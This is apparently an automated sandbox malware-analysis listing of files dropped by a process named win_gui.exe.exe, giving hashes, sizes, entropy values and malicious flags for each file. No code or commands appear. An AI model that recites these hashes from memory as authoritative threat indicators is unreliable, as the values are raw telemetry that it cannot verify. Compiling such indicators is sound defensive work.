                                SSDEEP:192:v4jtGe9V7qrFHOlPAhXvlBVhStW6asIciV87Rh+7KPThikEhzc52eT+VOe:v4tGhrFHMAhflBVg9bIHVozoz4VT+VOe
                                MD5:BE6CCD0CE4A8759CC8CDAC74B9978271
                                SHA1:40E91DDC003B59229C7180AEE71CD685CB4C1F53
                                SHA-256:55ED7837DA7CCDFF0A2200C7111FE3AF87CD6102FE8C2BC72ED15D311552D796
                                SHA-512:C9581A7DDAB75C6B2CBB8FE05D0113F275A963B9E3502C1624E2200CF9F34F4A1311AAAE3EB83E7A9DBBDB190EC7DB924913A024B4353498A89F1CD85C541B6C
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10897
                                Entropy (8bit):7.981257443509297
                                Encrypted:false
                                SSDEEP:192:TscAZgofTWALMmb3b6QdmHLEPPQQVGjH1f5VweN5bEz8/HpaVKwE+VOn:TscMlTWALMmPjdmYovVxS454A/J0KwEb
                                MD5:3EDCFDB75A6C4D91DFD3A8389F9DACAD
                                SHA1:D7E4B4CDD7CB2EE71805B0F5815A9FD64FFA8094
                                SHA-256:74FECCCD84283E342AA8CE37D6373A0926606EC149DA114481A8A64103790E98
                                SHA-512:78C0334943AF00BC22236E335972FF3D7760D48E194BECAEFEF24730722896CDCF1A86E5DECAA50E7983CD3857682DC02867807CC06EA0790EE2ED04432ADE6B
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12945
                                Entropy (8bit):7.985033327958154
                                Encrypted:false
                                SSDEEP:384:PX/hLTaS1imbQgJiGCpEopww5TF02YSFMBT4uh+VOb:11rsp1pHewj028BUw3
                                MD5:DCA25D37248EEC71F56FEDE6922F41FF
                                SHA1:2977CF528C1028FFE434D4E14BD0FB7C634FE217
                                SHA-256:AC27FFADCD902885A6A86C50285A280076757AD4EC829E63D2675B40DEE17926
                                SHA-512:72F36E46FCC5FDD6CB27B475D613B6D91225CC1B81CD5F7F64370F74D35802ABCDBA0C0A9A32EE898775B5B7955EA878EA7465C87FCD5E47582BA529AC180742
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6382
                                Entropy (8bit):7.966840648851026
                                Encrypted:false
                                SSDEEP:192:dlPfm7QGaVpYVVtt/CtIJz2c2lRV6gIe+VOZ:dlPfmjKWl8O2f74W+VOZ
                                MD5:3E86E5207A33B08CF40B1A37365D05D0
                                SHA1:F4284DA5549868F918064AAB16A4154E4E768C44
                                SHA-256:433EE5390496C4E9E4E1E5049BB4576D9D8F2D5A113E6EF01A78BAEC2F126714
                                SHA-512:CAD64EF92A7289ED802372F32470BB99BEDF12E356D4A8BCAB2D4CBB0095DAA935FDCC4051071CC21B8E06C736BCBF9E9D21D63A3E2B12704B9EC2A45F1A2A99
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13064
                                Entropy (8bit):7.986546990111769
                                Encrypted:false
                                SSDEEP:384:bznUyA9V//VK8pAY1A0IHv+B00iQzlJvJ1NRnMUF+VOW:PrA9V//iY1OvkjJvjNBzF6
                                MD5:BAAEBD3321BE2DCE32CEA7DE4A1BBD5F
                                SHA1:A6936A7CA403378FE0BD0B3AAEEF2115823CFC97
                                SHA-256:5F6EC671FA0B8CDF6EE3DD2B5CFDF3ABEFF68F053B9DC1F6259C0BF63C54D331
                                SHA-512:A4749D77251FEF179964E9BDC337B02940252376F930C40DE64D038B64BC08CEE7929F675B879788371A47EA50DB9333C53C5EBF89C6B59C701E81F5F1182EA9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8483
                                Entropy (8bit):7.977115834469991
                                Encrypted:false
                                SSDEEP:192:Rh6BU3nlZqXpwPmsI9moh4WWIjlWyWDX3pHucQ3PR6v+VOO:eg7XmsI4oyIjlvW9uP3PY+VOO
                                MD5:E451C76E48B2EA1C9CC0739A65D77679
                                SHA1:D7387584D963539D5536E75AF74326FD34030900
                                SHA-256:4B8C5B4C262B409E061ADEF36AB39487F33C8400597063F32176D38D39475995
                                SHA-512:959EB8FF971646C3DF49ED87A7F2C3E97C5635A570658450C1FDF32639906008F395ED3947F8EF08FCB39B43A14F03B35E3014D1F091251A6E25074E8FDC8F08
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10133
                                Entropy (8bit):7.981698705304034
                                Encrypted:false
                                SSDEEP:192:3Sh1E8iVYT8C9iKToz5HSmmc2IKZq4vIfzFlf4TXAytt6uNA0fZNGpuE+VOBq:ih/HRcKToz5HS02IKoKmzFlf4dtFTfZN
                                MD5:BB22305D0B0D1E926F99740AEDCEFE14
                                SHA1:F3305BFED8920FDC37BD5B628D73049000118246
                                SHA-256:0CE2641EF96F44D3662F853E90BD9F2751B29D15B7C37672688C28ADA98D5947
                                SHA-512:C2AB054360FF87338EC14244430931EA9034BEB6B39FC179B42B51B5463EE46A4B4BFB63B61386ED3F0DA019FD238A7933582439E6C3CC6C3972808ACC6A9850
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6028
                                Entropy (8bit):7.968488705223102
                                Encrypted:false
                                SSDEEP:96:7R/q7maUEn8f0j7IwIMIKrHC2E39nCgOszY/qfXlYLMgTpFDyFiTlrPQWBFDOev3:7Ri7maX8a5l6nCbTCfzgTCiTNPh6+VOY
                                MD5:9DFECCFBFB8489E376D92D46EA8CBAE7
                                SHA1:93847896288C0D431C3C18A3792081187FAD46EC
                                SHA-256:CC2A02DFE2D09F04055BEDAB33B7BD19AF12621D27BD0DF71CC6DA244551451B
                                SHA-512:A975766564503026EF85C1195196D063E680190627AC36B1B0368879E7FFD28DF059EC57A9FD8E7BA435B54FCCA5E7A5CCAFE8EB6D9EA3E1215E647DACADCC16
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9364
                                Entropy (8bit):7.979071230498844
                                Encrypted:false
                                SSDEEP:192:eIQbi+ZuhP0k7gB7JqFc87FY9ANWgulbX02QHD+VO8Qa:e2xhck7gBM6KYKNHuldQj+VOza
                                MD5:9401D58D3219EFC9E2450EC9B116D545
                                SHA1:58FE21C687A75B09E20626988CD31C14CF1D1E25
                                SHA-256:2759336065620DF2B408D7EAD61BAD2971084CC79E23C5DE964F084F4D5BF6AF
                                SHA-512:39C497F4FA43F77FEA4A51EE694FF86841991BDCC90637D6F90545358875B90004BAEF71B94AFFDBC0EF438D833F853EF8D1FE2473A99447B609A8B66F66C4B1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9081
                                Entropy (8bit):7.975992807608002
                                Encrypted:false
                                SSDEEP:192:l8x/6QzKxuGgeFFRu01pVcgWHHtoICDwJhxMknYWVbsQy+VO5:+/6TxRgeFLdpd6toICgjMiYEgt+VO5
                                MD5:B565D774A0C5F6D3FE55F597FCFF4122
                                SHA1:9E4300F76BA204121F3593FDC4E9D3E976C93160
                                SHA-256:FD871DE1D994EB9FEE505F0C0EDBE6C22A2895FFD2AE6848C256215355E8A075
                                SHA-512:487BF0CC729B1F1EF08326671771ABBBFE3549F26B9928D8C1530D021DC56AF9DE15296789ECEC2C2F152DED6F923EA279CD0057BC4FEE497DAF1C715BF7F299
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20798
                                Entropy (8bit):7.989939009321135
                                Encrypted:false
                                SSDEEP:384:bRemrodTzMoQc5/xU0V08dkCUISpxw7C2nXMwREaMEsu9B4+VOK:bRWdTzM8/D08qIp7C2DREZVu9eG
                                MD5:E8EDFF9352F09737356AEA272112767F
                                SHA1:B58A1FA77E8605BC6BD1727CA89BE74BD5AAA2C8
                                SHA-256:C05A9522AAD56A2C66B209E7EDA587D06D95FC2A5BF649E9878042D85DC99D4C
                                SHA-512:7C357390723E9CEA2EE6BF13030723987479593B348D94E21DEC7F01B32D008E9BCC025DE3EF44BFF21FD3FC9A3F2760DF4BA7D7DC8BF43ADA234930D02A0CB1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22181
                                Entropy (8bit):7.991599348584246
                                Encrypted:true
                                SSDEEP:384:WZgsqu8QvxHjAFT1axR80wdSZnCW4TlEIuMi7q52VZM5sG/P2f6xSBqBKKk9y+Vz:7u8QvpjS1axhwdS5CLTQMi7UijwSYgyC
                                MD5:63E823985C1F3E22A7BD7B2F31922D5E
                                SHA1:94870247E08A87BCBD835D2AEA8DFDF3310398A2
                                SHA-256:BBDD26CD70E226698AA625E9CD70C6C472380D7334470E63373126A27451CDC5
                                SHA-512:D5A79E0A175EBB103022C4D2A00DB28BD5C6CF0373DC36F963812F99EF59C8452767FBCF3F87CA13355EA808A07A6CCEC3FFD9AA8180DB182D1396A93A04BBFD
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11407
                                Entropy (8bit):7.984887276848373
                                Encrypted:false
                                SSDEEP:192:0vlk8gArDLJYmTmi+F5Ht4sMwRVDYtaSJhOMyqDqMD1iATRBQQx/6gmlzyGtef+n:0vlHgArDRTmhRtpHRVEhhOMxDq0lBQ0a
                                MD5:9EE659FE51511E60F0A2E4184541182E
                                SHA1:ACE6C9377BDF8192F1A17175430F2B3E2C0C576C
                                SHA-256:946B9C16ED9B7CBCCE5F690BEEDAFEB12A79B0146B176E2D0BA0B87FDDDCCA19
                                SHA-512:5C2A5CF93AFE83D1753A37A5D5C1EC6552946D0151275B3A558AA5CE0C533E657255A7B7C778E9840412D0C8712B4934FAD64F10C717198C100C68231C57F2B1
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5797
                                Entropy (8bit):7.96463843893395
                                Encrypted:false
                                SSDEEP:96:O3IqFQYoATpKzdzEaL/1N+lJupUse/u6qwEKqM+Pf5sVhPE5KeraYyutevuAVOb4:O4slo2gJz1ClVs2uFKqf5WMFraGt+VOc
                                MD5:8FC6160D28ACBB935E0D1E24B8E09A01
                                SHA1:66F05F82A2AD9F2DB3FE9DAFEA66ACAA1460FB8B
                                SHA-256:BBD96C13CFBCF10634A52CEEC5D27E21B67F30CEF15FD673D47236587F46B245
                                SHA-512:27F2AF53227F4045D49B3D28CAF7EB2C5E8A947BD7883A401E88CC86B170E394D28C36505281FBCE8B9934C9E101B51AE3E0E1082453B9F88E415A5E33097459
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6661
                                Entropy (8bit):7.974393688679913
                                Encrypted:false
                                SSDEEP:192:mNxLVJpGOsWBkSgypqggxMSZVbEkNI+VOI:0zTGJSkSCX6SrnNI+VOI
                                MD5:DD6DA9559642A2E63980CB7942B4A9E3
                                SHA1:E5DA0A5EC01D2A38FCA47E7B7496F6D1E1D7844E
                                SHA-256:34AA0D2D77FC4D775B7B4E0B1E4F0545004DBC410458CE233FC41AEF2CC8D48D
                                SHA-512:20C84401A03A0D82B8C7DE14A0F6CD93D802ED3C583E4454055E1CAC269854B74C6ABA04E05E750FC2ECC91DD93D08E9E67BA9BE745EB275C3B988BF7CC88856
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):14062
                                Entropy (8bit):7.986586784450276
                                Encrypted:false
                                SSDEEP:384:nlEe7CFY+YGike2nuBa4gRUCjB08gWFr19Hi+VOO:nL7CqvGbUCjBFp9HiS
                                MD5:E2FB26392AA3D6B9C219267B284027EF
                                SHA1:A238497C59C27F449BBFD1F172B11ABEF5557774
                                SHA-256:C31A38EDAE5AF93017F94DE8EFE2BA6C869D925CB57DC91A410C0D19A6AFEE29
                                SHA-512:91F0DD29D3C10CD0BA47EE6FCC414025B282D33598926CFBE165A59E83072EE890A1DB506E7B1E59C04AAD49C166CAB5C735C02DAC8F89D47E1A11A728E4B085
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10137
                                Entropy (8bit):7.980153268688112
                                Encrypted:false
                                SSDEEP:192:g9l2W5pEsISo/sn2Tu4sZ6rVxD7o1UsRU0jvH3Co6Fce6dEgF+VOv:uZc/sn8QCVxSzR7HIFceIEc+VOv
                                MD5:5F81F3EA15FFDD7122C03065431A969A
                                SHA1:B591AB8579555199183921FDCA68BF047ABF4717
                                SHA-256:63C515C2BB6CED1E70AC3276643A14C43BF5C6FAD90300592FAC80BE80E109A0
                                SHA-512:C74E13389335F702B47C78F3B70CE7E27F7F9D5EF2A02DBF76A0B625272CF49815B1C7E2EC1E22971E9EBC61DF319246BA1B5078ECB66BCB173E2BF9E9AB9064
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6537
                                Entropy (8bit):7.9721430468393315
                                Encrypted:false
                                SSDEEP:192:tUvZupE2VUDvCfOZRU2T0BxC0pFY39/9mmNCBUhDPy+VOc:tCupE2VUDvCfO/BT0Bs0pFY39oaDK+V5
                                MD5:D8682B92BA50A0E667F4E717716A8EDB
                                SHA1:AC8DDF988FFFC434F334F06632B87992FC6EBD77
                                SHA-256:6D929A529A935706F7A7BC50E7F47F15E295CE44A7673FBCE7B4A38197C70948
                                SHA-512:064A825F91F95DDDBF818E0FAF6AFAFF763616B29C5A0B4CB6C122F852DE7D5633A3DFF6A6C6EFA56FE98CB732BA065898CC58B4B1A7625AD6230EFDC037B251
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15271
                                Entropy (8bit):7.988409792530994
                                Encrypted:false
                                SSDEEP:384:AK3MqsT5xuN/kotjFevRJqJEbblYKQ4/37EQ+VOC:AK3MqAbRCepcabblYIEQm
                                MD5:FE0A6D02AAC35FD94A9B3FB1E6E09AEB
                                SHA1:1149F1AE4FD8652E26FC3BCBDF9403A6D8C1BA2E
                                SHA-256:D5F2D48E20CAC66BB2DA7E79BA07CF9B094679FE47059456882169301E79B04E
                                SHA-512:56B2B75A2EF9979FEB7EF9107E3BACE3F0204F42D183AECE07C19E5B6E89D78139FD4EFDFD50CE814B1BE442AE01F627A61E9375E8F7484893A89D628EDCE3E7
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10419
                                Entropy (8bit):7.979776154390843
                                Encrypted:false
                                SSDEEP:192:vUsKXxwxTunYO/UYF1xvZoGF8gI7GhKhOCrkD9CEc+4e+VOW:tqY8F/vHFJIqAhOCrkYXM+VOW
                                MD5:7B31E4F5979E9A3A083EC852A58CA5D0
                                SHA1:E39EFBC792DFCE907238E8868F362F356F27CE7D
                                SHA-256:50A02346507C161E0AF0C8F1E0D4B6DEF8D6DAF852DCC2D93A1221447C3DEC86
                                SHA-512:B3F1A1949BEB678FFF0D7B2E97D87200E9B7654847FB35925D09933DDD8ADB26216DCE254D08DA9A882B56374375811811EFB5B08A0DC6F978882BEA09E6514D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9248
                                Entropy (8bit):7.977948824062632
                                Encrypted:false
                                SSDEEP:192:WKjJ5EAhukM41gIWxFDIv38qXL62DvJyIzL1atuOW7XBU0BWC+VORg:TJ5ngkM4agvML2rJyIzL1ROWFpWC+VOS
                                MD5:E27B2D56093A1A801EE5BDC8C31BE9E1
                                SHA1:3D63E5C604F375D8147F5D1885E00B66FD8A47D3
                                SHA-256:A26221E158076B30EFE3E4E6807D9E619637947DFE4004AF2CB13228A09F91BE
                                SHA-512:78BAB5AA1FD3EA70291B2F089926A1FE5F4DDCBB17AF40D11BC204D518BC5BE3BCDC4208AFDF265FF3C6696420B069AE118C63E449017379151873451B72B20D
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10531
                                Entropy (8bit):7.9792688692585845
                                Encrypted:false
                                SSDEEP:192:4kEhQhFekCtSbr6KOqXSGOROMjPOSmJ41VO7pzq3iUoT8ZLpZKXdA7Ccc9+VOD:4k7jRCcbZricMDRmfz+BoYZjST9+VOD
                                MD5:34D37505BEC6C567C5D528338CDDFD4F
                                SHA1:30B23A80871B186B7ACDE48EF004ED34DE2B7A3E
                                SHA-256:CE9244BC689D0052B956692A4F8FA4F8C9D00D60AE689C7E43BE65FF638C1F18
                                SHA-512:926DF4EBAD21E2315005285551A44A5C859FEC5A266979B04537F81FD80B5EBE30F62D115BB18A4FB9F7AB69419335A6854FE256912647D0426747F772D7E12E
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10497
                                Entropy (8bit):7.980648811227902
                                Encrypted:false
                                SSDEEP:192:ntUwHJPPd8RwQPvr1FnLoxZ1K3WQUpB9KGm2Io7fG9MsTYRhCjPZ+VOSj:nOqPli9ZFnoZ1mWr75TYY7+Z+VOSj
                                MD5:525EB8EB259D7FF8FFD74876E2850F6B
                                SHA1:B141112419BF9777C36B75844B3ED96B607550FB
                                SHA-256:C23CD0C77C115708E6215EF0F22BC7F362FABA1D044B3F5B66ACE061F39B3821
                                SHA-512:266E7363646F806FA2009D57F471154EAFCF61E3246B057D2BA5E56AE23935943D399A8FDD29FA4CC7B77DA63E4DBA362D59DE4B887605B17FBC72FEAE2DF81F
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8181
                                Entropy (8bit):7.981091285459677
                                Encrypted:false
                                SSDEEP:192:ssuemrwKcwHGi80CXA8hMj7p91Cm0gbuCFSJ+VOY:snePGGv0CXDhMnpDCm0gbuQSJ+VOY
                                MD5:CE7FCAE2BA058E7AE865EE9C17647326
                                SHA1:6F8D48ABBD8014D87AFE48F18AD6626806E61926
                                SHA-256:12D54C2B945A4E318D7C13D273CBCDE5E227B0CE20A410C799BD245FCF012968
                                SHA-512:8548A990C64D04D8E7DF5D8D47F50D695192611508C456124BD2C96BC6079BC71878D455AE52B2870E019B6D558B5FF8CB33AB42D61B74113E5E016720D7DD21
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15974
                                Entropy (8bit):7.989960786463422
                                Encrypted:false
                                SSDEEP:384:Ff70Iy9MbkLawLDL/0trkoNwkGet+aueZ2+VO2:Be2bkLLWrkoSkG7Y2S
                                MD5:89CFD6B668ED95DDC457614D0370D226
                                SHA1:6AC839D1F45C62AF146674ED3789A407994F08E7
                                SHA-256:B85AE6EC58328096896693333F7AFADBE41C8517CA0AED4E7BA4CE038243818F
                                SHA-512:7FE21D625DE2E8FC584E5638BC7421DE121718A92E54F89329071C3E3C987D66206A0B59BF5E7914B275CDCC6E42AEA76E96EA6B8871B3FEC61F164C914E8053
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19846
                                Entropy (8bit):7.990788402256383
                                Encrypted:true
                                SSDEEP:384:Wfw62Z1GfJ6tyXr4VhG7q+XMQS3QJPNCJL5mwu7kPIsknEI/xT9eUn4sHLqLh1hk:j6+GfotyXCMr8QNVykkPIsknEIdIkHLh
                                MD5:E3769A04AD718D0DD21653BEACECF8B7
                                SHA1:5981107DC6329422E174565FEF6F102951164AF2
                                SHA-256:AC75E7F37A723EF327AD73069B0166680E2ACE46118CCC3F5A6295156CFBC9B9
                                SHA-512:42C52732381690011EDE26DA010A616820A1CE0A5981680C825327BA34BDF10EA34B8499A78AE492A750D530DA5054CFA3DD385BAA05BECD1E5E67BFC267976B
                                Malicious:true
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19809
                                Entropy (8bit):7.98929377950728
                                Encrypted:false
                                SSDEEP:384:JOPyrg3GhoBfFoKefuzzgB6Lt9n6um+OUBKPPhxX+VOi:hrg3GhofFobmzU0b6biIP7e
                                MD5:339E67BF0B5A9CCE9D2B9E46E743CDF9
                                SHA1:94DA17FE713C907DD102269D6D4EC3861E0CD9BB
                                SHA-256:65885C1CEFE203E168D3E8778168E2341D23C473465814CDA9E42292D1CA07C9
                                SHA-512:7E29A21839F95B30F134053BE6337D1ED873D507A9C438F869CAC10206A08D7762D72747036E4827335318EAAE255BDACAA61019334FB0938BB48B28DB306BCA
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9980
                                Entropy (8bit):7.981065188766269
                                Encrypted:false
                                SSDEEP:192:xIqk5Zqk2GC6WZlMDM/AznMODNmYmCcDRHHzG8KCPG4VGzVcW+VO7q:xIF9XilMA/ADN521T2CP5qVH+VOe
                                MD5:BF00E4537DE61930D13643BDEFD8D380
                                SHA1:B56510738B6CCEC6EDEC7F2BDEA203A013D92105
                                SHA-256:ADD081B68A3ECA55359465E7BF03FE3F57723A7C4754D79FA67B58B0129F20BB
                                SHA-512:D111F7B61FE8D3CAB31645C05E4607ECCBFA2D81391707210B7AF2B00983C7258B9D6C61AA970DDF8E7C2F45407A77445D0669541412796A999EDF603F69B280
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9529
                                Entropy (8bit):7.977336470367158
                                Encrypted:false
                                SSDEEP:192:ZYP/YQ+Rs9PxM2GODZDUQl06cdddNfzesA8zpKtaz23c7eGq+VOa:ZWmRsVDZ3lS7/fa2VMaz2BD+VOa
                                MD5:EA0335CB0309EBBFEC6D7B3022C4CF01
                                SHA1:D5AC42CF2696944752C89A1A4209B59652FF8F96
                                SHA-256:820CEB7B0DD7C8D7C45D8904BF8B118F154A187C4EE4745952AEB032F70A1309
                                SHA-512:0F639E3CE7E38D1A97CF86D33B414D710701DCD62F6125A0B256A2115F38DC5C37A21C426BBAAA038D68C65C6D4610B976EAC6CBA6DECB2C3645F0F3EE453621
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6591
                                Entropy (8bit):7.97072341972139
                                Encrypted:false
                                SSDEEP:192:MalrU+K/y6L281ATT8tiHaDgrgzC/+VOI:MalfK/yCYeirx+VOI
                                MD5:4763DF2DE3B37DC8D33A2B35A684D4BD
                                SHA1:29A5193A707944E6369ED13F4A5CB6BF5645316A
                                SHA-256:707DF8C0E55D9D7FB912B781F02DDE952CC458CDE95C152070CA55887A42099B
                                SHA-512:5F630499B6B93E2482637BE6068761659B06182CB98C0389B8EEEB0AA16C6CACF740A21AFBB725EC461615EA7166F91188CFFEC2F242A599C31D2ECB2A8D3DDF
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12601
                                Entropy (8bit):7.984932607881382
                                Encrypted:false
                                SSDEEP:192:ShQdZCqBGpoEq6p+g7YzCTXV7p9aksM8XM4K8/2Hmek9+1xsUjK+VOd:S2d4No8p+zghp9aZj1K4YmekI5K+VOd
                                MD5:CE2F12FF1C924A6FD4E0FD4A65163B02
                                SHA1:D4D7B13401C6924F624D2906338AC42C1C8CABA3
                                SHA-256:3B78D7465DDA0F1398468334BFCC32BBEDE468675B5A57736F31CF980E8252B3
                                SHA-512:156020A4BE7B8EE9DF95FAEF410221A23D8033AE47C9385985A68088F382BF94AE837767DDA181D6E16C87EE215A18B57498E668A3103544060EB3E082D5E6B6
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7777
                                Entropy (8bit):7.976938975246717
                                Encrypted:false
                                SSDEEP:192:aJEefat9c5bzZNpa/PT1gu5JAp5Xdx3S6JLYEy2TI5eOfIC+VOm:aJpSbcrNpSTO2+9RS6JLfDTIhfR+VOm
                                MD5:15A2D572B2FD85FB99EBBC396518E27C
                                SHA1:A859316CFAFF6063C8F40710D6A5E60B8FADFB04
                                SHA-256:FF7DDEF15DD7B8FE1C2A8755F77243BF258459BB90D8597250AD9B0FD4D85113
                                SHA-512:B7D02C06D3785827B3BC9E0D42753516A23164F857120C4BFB0BA1FD5F91CE6DEF5CCD2654536536F1F90C0908413B2A7900B1B02238BBC921A40C22196FAFE3
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9833
                                Entropy (8bit):7.9801392373719295
                                Encrypted:false
                                SSDEEP:192:G5jS0BemTyUa7z9smSRm5bD7tVVpmMiMIB4JKu+VOV:rKazsmSR6DJvpmM9Icp+VOV
                                MD5:14FF1DB465F42C6484D59170B73FBF4C
                                SHA1:04ACFDAED15BA3986428EDC3D1E651977D4C2018
                                SHA-256:47FC6FE071EA856469ACDB1919A1C171F3B9967C19D4E75EAB9EDCFA6E059EE7
                                SHA-512:156029C1F7CDCD0DA66991657819F06EC52EC5C8778F6E1AE3249652EAB494E5A05CA59F1901BFE83D067EBCE0908AA0007BE5E99C38DE92851FB48DE730B530
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9142
                                Entropy (8bit):7.9789833760269175
                                Encrypted:false
                                SSDEEP:192:AQcFIZKlqzmU9zVcFPcNyEwdI8G7ytfuN3XmPhMRGE+VOh6:AQcuZmlKmPZECIw5uN3kE+VOs
                                MD5:FAAF26C91BBE9AF2E7DC79F0FC7D9B5C
                                SHA1:2CDCA2399FD1D1ABFE48EC0768C719A9113F3090
                                SHA-256:C79D1628DCF773A26151359FD6462CCABBFC32F6390CC56489DCA131C8BF21C3
                                SHA-512:CE48FC644511BD729BF6742A00A29EF585B087F36A1DD1BB25D02A674AFD38F495E61315C85441A08294D8BF9664EB2C87F7D590146AF05CCD4F89826D5BB703
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):13069
                                Entropy (8bit):7.986898334693524
                                Encrypted:false
                                SSDEEP:384:2Lx4AFPD9EGUxFBCN/aLCzkVoffNlLFu/0Ays+VOB:04Av+3CNiLCztpFUfyst
                                MD5:3DE557DA6B4E7C3C4B7B30E8EF237215
                                SHA1:93CCDF26325936BC6224E0C2BBE366F0BA341B93
                                SHA-256:97DB990CC6C9F0AFBAE4DDABB5B65A278ECCFEDA18A5D0D94AC02E21FD39ED62
                                SHA-512:B08A5234D456BC0764E40A91C24580377E5CFEFEFF7EF36F30A6734B10198387D4C2271955A0E9A9C12EEE8D65035A3A6AA10634EF00E9BDC6BA210A390681E9
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):15735
                                Entropy (8bit):7.987095028651559
                                Encrypted:false
                                SSDEEP:384:2LhO4zpx4VA1UMcTn+A8IoOqZ3bJSTUNSVRCX+VOy:04GpyVA1xcTnGb3ZUTUIOe
                                MD5:A20C4C2119A03A5724EBC037BA844AC5
                                SHA1:FA79950FF21975CEB6E9437F19C304242AF88861
                                SHA-256:BCE8BCA6461B7E2CA3673E11FF6F4012BB7B56C2CCB8370A3AEDA08B27F3209D
                                SHA-512:5C21667C8CE36111869AC398BD6E645523D070BAD2397BC4428985F38E294814E312E575ADE1483FA23E5CB6E6A9CF6C7FCCF5B07FFDB13D7CAAC87D00C9A7F4
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16462
                                Entropy (8bit):7.988783538609353
                                Encrypted:false
                                SSDEEP:384:APqTTnMP+5u6SbTc/JW0ouGrKZt/bnPcXPfBawj+VOv:WZ6SbTJ0++Zt/bPIBD
                                MD5:EADDFA23A909293F11B66DE0A302DA62
                                SHA1:2E02995D2FA6DE5AB77E19E3F01A35677D15C2C3
                                SHA-256:27FFE2862FA67173BED2195389ECCA3C0189F1FB52D601D8C5AE874DACF8551C
                                SHA-512:C1C257F732C22B6A9729E683AD5F98BEBB6C6714216CE1292099B14B8DB6317F62FAE9E5032DC9EFB31E7428C1EC72EA1FFE63172CFAE8A0F848761636617667
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9839
                                Entropy (8bit):7.979826203608219
                                Encrypted:false
                                SSDEEP:192:MQzlajguZA33AHkboyfp6oKHsV6qPv+/pxIuG1lDTGudTWEYtLxpC0cIl1tXY+V+:MQzwtZyZzsoIXs+QpdGVEYtu0D2+VOz
                                MD5:4D061A6FC01798D8D6693ADA909096FC
                                SHA1:67B8B2A07BBB512D37D45F85EA0F5DE19807B5AB
                                SHA-256:73BFAE9453404152CA2D2DA29BF5C12EF54920C3965AA051D7EBF0AD62919C18
                                SHA-512:749041D93D3374A7238B214F8255DD1193553DA643306D139D590D05F2BACEB8B2930D9129482C2A095DDA76BCBEE481085BCC8FFAB67AA7B0B92D5DBBD18FBD
                                Malicious:false
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
